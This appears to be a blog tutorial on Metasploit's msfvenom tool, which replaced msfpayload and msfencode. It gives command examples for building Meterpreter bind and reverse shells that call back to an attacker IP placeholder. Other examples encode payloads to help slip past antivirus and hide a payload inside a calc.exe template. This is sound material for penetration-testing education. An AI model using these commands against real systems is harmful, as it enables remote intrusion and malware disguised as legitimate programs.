Msfvenom: One Single Tool Instead Of Msfpayload And Msfencode

Msfvenom Instead Of Msfpayload And Msfencode-

From 8th june 2015 we will no longer receive the services of msfpayload and msfencode. They are going to retire permanently. Yeah! Permanently off course this is a bad news. These both tools are serving us since ten years but the time has come to say good bye. Thank you msfpayload and msfencode for serving us in every level of hacking or penetration testing we will never forget you.

But the good news is msfpayload and msfencode are being replaced by a new tool called msfvenom. This is the combination of both the tools, almost from three and half years this new tool is being tested and the time has come to use it.

msfvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single framework instance. The advantages of msfvenom are:

  • One single tool
  • Standardized command line options
  • Increased speed

There are wide range of options that came under msfvenom, To start using msfvenom, first please take a look at the options it supports:

root-Manin@kali:~# msfvenom -h
Usage: /usr/bin/msfvenom [options] <var=val>
    -p, –payload    <payload>       Payload to use. Specify a ‘-‘ or stdin to use custom payloads
    -l, –list       [module_type]   List a module type example: payloads, encoders, nops, all
    -n, –nopsled    <length>        Prepend a nopsled of [length] size on to the payload
    -f, –format     <format>        Output format (use –help-formats for a list)
    -e, –encoder    [encoder]       The encoder to use
    -a, –arch       <architecture>  The architecture to use
        –platform   <platform>      The platform of the payload
    -s, –space      <length>        The maximum size of the resulting payload
    -b, –bad-chars  <list>          The list of characters to avoid example: ‘x00xff’
    -i, –iterations <count>         The number of times to encode the payload
    -c, –add-code   <path>          Specify an additional win32 shellcode file to include
    -x, –template   <path>          Specify a custom executable file to use as a template
    -k, –keep                       Preserve the template behavior and inject the payload as a new thread
    -o, –options                    List the payload’s standard options
    -h, –help                       Show this message
        –help-formats               List available formats

Basic usage of msfvenom

How to generate a payload

To generate a payload, there are two flags that you must supply (-p and -f):

  • The -p flag: Specifies what payload to generate

To see what payloads are available from Framework, you can do:

./msfvenom -l payloads

The -p flag also supports “-” as a way to accept a custom payload:

cat payload_file.bin | ./msfvenom -p – -a x86 –platform win -e x86/shikata_ga_nai -f raw

  • The -f flag: Specifies the format of the payload

Syntax example:

./msfvenom -p windows/meterpreter/bind_tcp -f exe

To see what formats are supported, you can do the following to find out:

./msfvenom –help-formats

Typically, this is probably how you will use msfvenom:

$ ./msfvenom -p windows/meterpreter/reverse_tcp lhost=[Attacker’s IP] lport=4444 -f exe -o /tmp/my_payload.exe

How to encode a payload

By default, the encoding feature will automatically kick in when you use the -b flag (the badchar flag). In other cases, you must use the -e flag like the following:

./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -f raw

To find out what encoders you can use, you can use the -l flag:

./msfvenom -l encoders

You can also encode the payload multiple times using the -i flag. Sometimes more iterations may help avoiding antivirus, but know that encoding isn’t really meant to be used a real AV evasion solution:

./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 3

How to avoid bad characters

The -b flag is meant to be used to avoid certain characters in the payload. When this option is used, msfvenom will automatically find a suitable encoder to encode the payload:

./msfvenom -p windows/meterpreter/bind_tcp -b ‘x00’ -f raw

How to supply a custom template

By default, msfvenom uses templates from the msf/data/templates directory. If you’d like to choose your own, you can use the -x flag like the following:

./msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -f exe > new.exe

Please note: If you’d like to create a x64 payload with a custom x64 custom template for Winodws, then instead of the exe format, you should use exe-only:

./msfvenom -p windows/x64/meterpreter/bind_tcp -x /tmp/templates/64_calc.exe -f exe-only > /tmp/fake_64_calc.exe

The -x flag is often paired with the -k flag, which allows you to run your payload as a new thread from the template. However, this currently is only reliable for older Windows machines such as x86 Windows XP.

Official announcement article from Rapid7 Community

Sharing is caring!

Leave a Reply

Your email address will not be published. Required fields are marked *

Related Posts

Begin typing your search above and press enter to search. Press ESC to cancel.

Back To Top

So glad to see you sticking around!

Want to be the first one to receive the new stuff?

Enter your email address below and we'll send you the goodies straight to your inbox.

Thank You For Subscribing

This means the world to us!

Spamming is not included! Pinky promise.